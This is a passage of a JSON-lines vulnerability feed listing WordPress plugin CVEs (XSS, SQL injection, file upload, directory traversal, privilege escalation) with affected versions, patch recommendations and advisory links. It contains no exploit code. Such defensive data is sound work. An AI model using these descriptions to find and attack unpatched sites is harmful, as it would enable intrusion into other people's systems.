version","refs":"[{\"url\":\"https:\\\/\\\/coderevolution.ro\\\/knowledge-base\\\/faq\\\/full-changelog-aiomatic-automatic-ai-content-writer-editor-gpt-3-gpt-4-chatgpt-chatbot-ai-toolkit\\\/#item-description__changelog\",\"name\":\"https:\\\/\\\/coderevolution.ro\\\/knowledge-base\\\/faq\\\/full-changelog-aiomatic-automatic-ai-content-writer-editor-gpt-3-gpt-4-chatgpt-chatbot-ai-toolkit\\\/#item-description__changelog\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69de7d93-b255-4d41-8680-9762ff632804?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69de7d93-b255-4d41-8680-9762ff632804?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1745","slug":"testimonial-slider-and-showcase","versionImpact":"2.3.6","versionEndExcluding":"2.3.7","description":"The Testimonial Slider WordPress plugin before 2.3.7 does not properly ensure that a user has the necessary capabilities to edit certain sensitive Testimonial Slider WordPress plugin before 2.3.7 settings, making it possible for users with at least the Author role to edit them.","recommendation":"Update to version 2.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b63bbfeb-d6f7-4c33-8824-b86d64d3f598\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b63bbfeb-d6f7-4c33-8824-b86d64d3f598\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5314","slug":"3d-flipbook-dflip-lite","versionImpact":"2.3.65","versionEndExcluding":"2.3.67","description":"The Dear Flipbook \u2013 PDF Flipbook, 3D Flipbook, PDF embed, PDF viewer plugin for WordPress is vulnerable to DOM-Based Reflected Cross-Site Scripting via the \u2018pdf-source\u2019 parameter in all versions up to, and including, 2.3.65 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.3.67, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/3d-flipbook-dflip-lite\\\/trunk\\\/assets\\\/js\\\/dflip.js#L8861\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/3d-flipbook-dflip-lite\\\/trunk\\\/assets\\\/js\\\/dflip.js#L8861\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/3d-flipbook-dflip-lite\\\/trunk\\\/assets\\\/js\\\/dflip.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/3d-flipbook-dflip-lite\\\/trunk\\\/assets\\\/js\\\/dflip.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/3d-flipbook-dflip-lite\\\/trunk\\\/assets\\\/js\\\/libs\\\/pdf.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/3d-flipbook-dflip-lite\\\/trunk\\\/assets\\\/js\\\/libs\\\/pdf.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3319013\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3319013\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e316c636-2dd7-4d50-8c99-36f08ecf03ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e316c636-2dd7-4d50-8c99-36f08ecf03ad?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6289","slug":"swift-performance-lite","versionImpact":"2.3.6.14","versionEndExcluding":"2.3.6.15","description":"The Swift Performance Lite WordPress plugin before 2.3.6.15 does not prevent users from exporting the plugin's settings, which may include sensitive information such as Cloudflare API tokens.","recommendation":"Update to version 2.3.6.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8c83dd57-9291-4dfc-846d-5ad47534e2ad\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8c83dd57-9291-4dfc-846d-5ad47534e2ad\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11387","slug":"easy-liveblogs","versionImpact":"2.3.5","versionEndExcluding":"2.3.6","description":"The Easy Liveblogs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'elb_liveblog' shortcode in all versions up to, and including, 2.3.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3193445%40easy-liveblogs&new=3193445%40easy-liveblogs&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3193445%40easy-liveblogs&new=3193445%40easy-liveblogs&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e721128-2e34-4717-8945-5fd25f2efd7d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e721128-2e34-4717-8945-5fd25f2efd7d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4657","slug":"menu-ordering-reservations","versionEndExcluding":"2.3.6","description":"The Restaurant Menu WordPress plugin before 2.3.6 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a90a413d-0e00-4da8-a339-d6cdfba70bb3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a90a413d-0e00-4da8-a339-d6cdfba70bb3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13798","slug":"post-grid","versionImpact":"2.3.5","versionEndExcluding":"2.3.6","description":"The Post Grid and Gutenberg Blocks \u2013 ComboBlocks plugin for WordPress is vulnerable to unauthorized order creation in all versions up to, and including, 2.3.5. This is due to insufficient verification on form fields. This makes it possible for unauthenticated attackers to create new orders for products and mark them as paid without actually completing a payment.","recommendation":"Update to version 2.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242737%40post-grid&new=3242737%40post-grid&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242737%40post-grid&new=3242737%40post-grid&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/705823ff-e9c3-4b8b-b71c-3b60d0d15b01?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/705823ff-e9c3-4b8b-b71c-3b60d0d15b01?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6423","slug":"beeteam368-extensions","versionImpact":"2.3.5","versionEndExcluding":"2.3.6","description":"The BeeTeam368 Extensions plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the handle_submit_upload_file() function in all versions up to, and including, 2.3.5. This makes it possible for authenticated attackers with Subscriber-level access or higher to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/vidmov-video-wordpress-theme\\\/35542187#item-description__change-log\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/vidmov-video-wordpress-theme\\\/35542187#item-description__change-log\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96170b82-6ed9-4a52-8592-944163cdd3cf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96170b82-6ed9-4a52-8592-944163cdd3cf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11830","slug":"3d-flipbook-dflip-lite","versionImpact":"2.3.52","versionEndExcluding":"2.3.53","description":"The PDF Flipbook, 3D Flipbook\u2014DearFlip plugin for WordPress is vulnerable to Stored Cross-Site Scripting via outline settings in all versions up to 2.3.52 due to insufficient input sanitization and output escaping on user-supplied data. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.3.53, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215546%403d-flipbook-dflip-lite&new=3215546%403d-flipbook-dflip-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215546%403d-flipbook-dflip-lite&new=3215546%403d-flipbook-dflip-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3218103%403d-flipbook-dflip-lite&new=3218103%403d-flipbook-dflip-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3218103%403d-flipbook-dflip-lite&new=3218103%403d-flipbook-dflip-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88391d02-66d9-4c00-a519-17f92f64a17a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88391d02-66d9-4c00-a519-17f92f64a17a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2362","slug":"button-generation","versionEndExcluding":"2.3.5","description":"The Float menu WordPress plugin before 5.0.2, Bubble Menu WordPress plugin before 3.0.4, Button Generator WordPress plugin before 2.3.5, Calculator Builder WordPress plugin before 1.5.1, Counter Box WordPress plugin before 1.2.2, Floating Button WordPress plugin before 5.3.1, Herd Effects WordPress plugin before 5.2.2, Popup Box WordPress plugin before 2.2.2, Side Menu Lite WordPress plugin before 4.0.2, Sticky Buttons WordPress plugin before 3.1.1, Wow Skype Buttons WordPress plugin before 4.0.2, WP Coder WordPress plugin before 2.5.6 do not escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6381","slug":"beeteam368-extensions","versionImpact":"2.3.4","versionEndExcluding":"2.3.5","description":"The BeeTeam368 Extensions plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.3.4 via the handle_remove_temp_file() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform actions on files outside of the originally intended directory. This vulnerability can be used to delete the wp-config.php file, which can be leveraged into a site takeover.","recommendation":"Update to version 2.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/vidmov-video-wordpress-theme\\\/35542187\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/vidmov-video-wordpress-theme\\\/35542187\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aed40456-43c3-4647-9bce-e7c6139c84cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aed40456-43c3-4647-9bce-e7c6139c84cd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6379","slug":"beeteam368-extensions-pro","versionImpact":"2.3.4","versionEndExcluding":"2.3.5","description":"The BeeTeam368 Extensions Pro plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.3.4 via the handle_live_fn() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform actions on files outside of the originally intended directory. This vulnerability can be used to delete the wp-config.php file, which can be leveraged into a site takeover.","recommendation":"Update to version 2.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/vidmov-video-wordpress-theme\\\/35542187\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/vidmov-video-wordpress-theme\\\/35542187\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26abf509-f0a9-4849-9028-d6c42832158f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26abf509-f0a9-4849-9028-d6c42832158f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10107","slug":"simplr-registration-form","versionImpact":"2.3.4","versionEndExcluding":"2.3.5","description":"A vulnerability was found in Simplr Registration Form Plus+ Plugin up to 2.3.4 on WordPress and classified as problematic. This issue affects some unknown processing. The manipulation leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 2.3.5 is able to address this issue. The name of the patch is d588446844dd49232ab400ef213ff5b92121c33e. It is recommended to upgrade the affected component. The identifier VDB-230153 was assigned to this vulnerability.","recommendation":"Update to version 2.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230153\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230153\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.230153\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.230153\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/simplr-registration-form\\\/commit\\\/d588446844dd49232ab400ef213ff5b92121c33e\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/simplr-registration-form\\\/commit\\\/d588446844dd49232ab400ef213ff5b92121c33e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1452","slug":"favorites","versionImpact":"2.3.4","versionEndExcluding":"2.3.5","description":"The Favorites WordPress plugin before 2.3.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/47365daf-7ef5-471a-ab0e-f6d1b40ca56c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/47365daf-7ef5-471a-ab0e-f6d1b40ca56c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3809","slug":"debug-log-manager","versionImpact":"2.3.4","versionEndExcluding":"2.3.5","description":"The Debug Log Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the auto-refresh debug log in all versions up to, and including, 2.3.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3267252%40debug-log-manager&new=3267252%40debug-log-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3267252%40debug-log-manager&new=3267252%40debug-log-manager&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbc3210d-224e-4ed2-ada7-dc17deb17584?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbc3210d-224e-4ed2-ada7-dc17deb17584?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13541","slug":"adirectory","versionImpact":"2.3","versionEndExcluding":"2.3.5","description":"The aDirectory \u2013 WordPress Directory Listing Plugin plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the adqs_delete_listing() function in all versions up to, and including, 2.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary posts.","recommendation":"Update to version 2.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/adirectory\\\/tags\\\/1.3.4\\\/inc\\\/Frontend\\\/Ajax.php#L115\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/adirectory\\\/tags\\\/1.3.4\\\/inc\\\/Frontend\\\/Ajax.php#L115\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/adirectory\\\/tags\\\/1.9.5\\\/inc\\\/Frontend\\\/Ajax.php#L115\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/adirectory\\\/tags\\\/1.9.5\\\/inc\\\/Frontend\\\/Ajax.php#L115\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/adirectory\\\/tags\\\/2.1\\\/inc\\\/Frontend\\\/Ajax.php#L113\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/adirectory\\\/tags\\\/2.1\\\/inc\\\/Frontend\\\/Ajax.php#L113\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3235167%40adirectory&new=3235167%40adirectory&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3235167%40adirectory&new=3235167%40adirectory&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c99b8a94-c35b-43a1-bb14-2ca97be421cc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c99b8a94-c35b-43a1-bb14-2ca97be421cc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13659","slug":"listamester","versionImpact":"2.3.4","versionEndExcluding":"2.3.5","description":"The Listamester plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'listamester' shortcode in all versions up to, and including, 2.3.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/listamester\\\/trunk\\\/includes\\\/class-listamester.php#L105\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/listamester\\\/trunk\\\/includes\\\/class-listamester.php#L105\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3225538%40listamester&new=3225538%40listamester&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3225538%40listamester&new=3225538%40listamester&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68b4358d-d4b4-415b-a19f-e58b155ceac9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68b4358d-d4b4-415b-a19f-e58b155ceac9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-2413","slug":"slide-anything","versionImpact":"2.3.46","versionEndExcluding":"2.3.47","description":"The Slide Anything WordPress plugin before 2.3.47 does not properly sanitize or escape the slide title before outputting it in the admin pages, allowing a logged in user with roles as low as Author to inject a javascript payload into the slide title even when the unfiltered_html capability is disabled.","recommendation":"Update to version 2.3.47, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2e38b1bb-4410-45e3-87ca-d47a2cce9e22\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2e38b1bb-4410-45e3-87ca-d47a2cce9e22\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8717","slug":"3d-flipbook-dflip-lite","versionImpact":"2.3.32","versionEndExcluding":"2.3.42","description":"The PDF Flipbook, 3D Flipbook, PDF embed, PDF viewer \u2013 DearFlip plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'pdf_source' parameter in all versions up to, and including, 2.3.32 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.3.42, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d4c2944-28e8-4866-b4da-91cf12d9d115?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d4c2944-28e8-4866-b4da-91cf12d9d115?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/3d-flipbook-dflip-lite\\\/trunk\\\/assets\\\/js\\\/dflip.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/3d-flipbook-dflip-lite\\\/trunk\\\/assets\\\/js\\\/dflip.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3172275\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3172275\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3200","slug":"wpforo","versionImpact":"2.3.3","versionEndExcluding":"2.3.4","description":"The wpForo Forum plugin for WordPress is vulnerable to SQL Injection via the 'slug' attribute of the 'wpforo' shortcode in all versions up to, and including, 2.3.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f54cdad2-88db-4604-8064-fa6175176760?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f54cdad2-88db-4604-8064-fa6175176760?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/wpforo\\\/tags\\\/2.3.3&new_path=\\\/wpforo\\\/tags\\\/2.3.4&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/wpforo\\\/tags\\\/2.3.3&new_path=\\\/wpforo\\\/tags\\\/2.3.4&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6035","slug":"eazydocs","versionEndExcluding":"2.3.4","description":"The EazyDocs WordPress plugin before 2.3.4 does not properly sanitize and escape \"data\" parameter before using it in an SQL statement via an AJAX action, which could allow any authenticated users, such as subscribers, to perform SQL Injection attacks.","recommendation":"Update to version 2.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/44f5a29a-05f9-40d2-80f2-6fb2bda60d79\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/44f5a29a-05f9-40d2-80f2-6fb2bda60d79\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6585","slug":"wp-jobsearch","versionImpact":"2.3.3","versionEndExcluding":"2.3.4","description":"The WP JobSearch WordPress plugin before 2.3.4 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server","recommendation":"Update to version 2.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/757412f4-e4f8-4007-8e3b-639a72b33180\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/757412f4-e4f8-4007-8e3b-639a72b33180\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6584","slug":"wp-jobsearch","versionImpact":"2.3.3","versionEndExcluding":"2.3.4","description":"The WP JobSearch WordPress plugin before 2.3.4 does not prevent attackers from logging-in as any users with the only knowledge of that user's email address.","recommendation":"Update to version 2.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e528e3cd-a45c-4bf7-a37a-101f5c257acd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e528e3cd-a45c-4bf7-a37a-101f5c257acd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3649","slug":"wp-jquery-lightbox","versionImpact":"2.3.3","versionEndExcluding":"2.3.4","description":"The LightPress Lightbox WordPress plugin before 2.3.4 does not check download links point to valid, non-Javascript URLs, allowing users with at least the contributor role to conduct Stored XSS attacks.","recommendation":"Update to version 2.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/37fb7f3b-1766-4c2c-9b78-f77f15a04476\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/37fb7f3b-1766-4c2c-9b78-f77f15a04476\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9636","slug":"post-grid","versionImpact":"2.3.3","versionEndExcluding":"2.3.4","description":"The Post Grid and Gutenberg Blocks plugin for WordPress is vulnerable to privilege escalation in versions 2.2.85 to 2.3.3. This is due to the plugin not properly restricting what user meta can be updated during profile registration. This makes it possible for unauthenticated attackers to register on the site as an administrator.","recommendation":"Update to version 2.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid\\\/tags\\\/2.2.93\\\/includes\\\/blocks\\\/form-wrap\\\/functions.php#L3200\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid\\\/tags\\\/2.2.93\\\/includes\\\/blocks\\\/form-wrap\\\/functions.php#L3200\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3117675\\\/post-grid\\\/trunk\\\/includes\\\/blocks\\\/form-wrap\\\/functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3117675\\\/post-grid\\\/trunk\\\/includes\\\/blocks\\\/form-wrap\\\/functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221012\\\/post-grid\\\/trunk\\\/includes\\\/blocks\\\/form-wrap\\\/functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221012\\\/post-grid\\\/trunk\\\/includes\\\/blocks\\\/form-wrap\\\/functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bbe01b8-24ed-4e1e-bafc-0f4dea96c1f3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bbe01b8-24ed-4e1e-bafc-0f4dea96c1f3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
